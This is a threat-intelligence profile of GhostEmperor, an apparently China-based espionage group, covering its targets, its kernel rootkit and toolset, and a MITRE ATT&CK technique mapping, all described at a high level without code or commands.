GhostEmperor | |
Location | China |
Date of Initial Activity | 2020 |
Suspected Attribution | APT |
Motivation | Cyberwarfare |
Software | Windows |
Overview
GhostEmperor, an advanced persistent threat (APT) group believed to originate from China, has garnered significant attention for its sophisticated cyber espionage activities targeting governmental and telecommunications sectors across Southeast Asia. First identified in 2020, this threat actor operates with a singular focus on information theft, deploying advanced tactics that underscore its expertise in stealth and concealment. Notably, GhostEmperor stands out due to its unique use of a previously unknown Windows kernel-mode rootkit, which allows the group to maintain remote control over compromised systems while evading detection by traditional security measures.
The operations of GhostEmperor are characterized by their complexity and precision. The group employs a distinctive loading scheme that utilizes components from an open-source project known as “Cheat Engine” to bypass Windows Driver Signature Enforcement (DSE). This innovative approach not only enhances their ability to install malicious code without alerting security protocols but also signifies a level of technical proficiency that sets GhostEmperor apart from other cyber threat actors. Their toolkit includes various tools, such as Demodex and PsExec, which they use to facilitate reconnaissance, lateral movement, and data exfiltration within targeted networks.
Common Targets
- Public Administration
- Information
- Afghanistan
- Egypt
- Ethiopia
- Indonesia
- Malaysia
- Thailand
- Vietnam
Attack vectors
Software Vulnerabilities
How they work
One of the most distinctive aspects of GhostEmperor’s operations is its use of a previously unknown Windows kernel-mode rootkit. This rootkit, which enables remote control over targeted servers, provides an unparalleled level of stealth. Rootkits operate at a low level in the operating system, allowing threat actors to conceal their presence and evade detection by security solutions. GhostEmperor’s rootkit employs a sophisticated loading mechanism that circumvents Windows Driver Signature Enforcement by utilizing components from an open-source project known as “Cheat Engine.” This approach not only demonstrates the group’s technical expertise but also indicates a careful selection of tools that enhance their operational effectiveness.
Upon gaining initial access to a target system, GhostEmperor employs various techniques to establish persistence and maintain control. The group has been observed using the Pantegana backdoor, an open-source tool that facilitates remote access and control. By embedding such tools into the compromised environment, they can execute commands, gather intelligence, and potentially move laterally across networks. Additionally, the use of certutil and PsExec enhances their ability to execute scripts and commands remotely, further solidifying their foothold within the target infrastructure.
Once entrenched within a network, GhostEmperor meticulously conducts reconnaissance to gather information about the system and its configurations. This involves utilizing techniques such as System Information Discovery and Network Service Scanning to identify potential vulnerabilities and valuable assets. By mapping the environment, the group can prioritize targets for further exploitation, ultimately enhancing their operational efficiency. This phase is crucial, as it informs their subsequent actions, whether they be data collection or lateral movement to other high-value targets within the network.
GhostEmperor’s exfiltration strategies are equally advanced. They often utilize Exfiltration Over Command and Control Channel, allowing them to transfer stolen data stealthily without raising alarms. The group’s focus on maintaining a low profile while conducting operations highlights their awareness of modern cybersecurity defenses and the importance of minimizing detection risks. Their reliance on both custom tools and publicly available exploits underscores a hybrid approach to cyber operations, wherein they can adapt to varying target environments and security postures.
In conclusion, GhostEmperor represents a formidable threat in the landscape of cyber espionage. Their technical operations reflect a deep understanding of both system vulnerabilities and operational security, allowing them to execute complex campaigns against high-profile targets with minimal detection. As organizations continue to strengthen their cybersecurity measures, the adaptability and sophistication of threat actors like GhostEmperor pose ongoing challenges, necessitating continuous vigilance and innovative defense strategies in the face of evolving cyber threats.
MITRE Tactics and Techniques
Initial Access (TA0001):
Exploit Public-Facing Application (T1190): GhostEmperor may leverage vulnerabilities in public-facing applications to gain initial access.
Execution (TA0002):
Command and Scripting Interpreter (T1059): Utilizes scripts or command-line tools to execute malicious commands.
Persistence (TA0003):
Boot or Logon Autostart Execution (T1547): The rootkit can establish persistence by manipulating system startup processes.
Privilege Escalation (TA0004):
Exploitation for Privilege Escalation (T1068): Gains elevated privileges through exploiting vulnerabilities within the operating system.
Defense Evasion (TA0005):
Obfuscated Files or Information (T1027): GhostEmperor uses obfuscation techniques to hide malicious code.
Rootkit (T1014): Deploys a kernel-mode rootkit that is difficult to detect and analyze.
Credential Access (TA0006):
Credential Dumping (T1003): Harvests credentials from the system to facilitate lateral movement.
Discovery (TA0007):
System Information Discovery (T1082): Gathers information about the system and network configurations.
Network Service Scanning (T1046): Scans the network for services to identify potential targets for further exploitation.
Lateral Movement (TA0008):
Remote Services (T1021): Uses remote services such as PsExec for lateral movement within the network.
Collection (TA0009):
Data from Information Repositories (T1213): Collects sensitive information from compromised systems.
Exfiltration (TA0010):
Exfiltration Over Command and Control Channel (T1041): Transfers stolen data over established command and control channels.
Impact (TA0040):
Data Manipulation (T1565): Potentially alters data to achieve the group’s objectives, though this is more common in disruptive operations.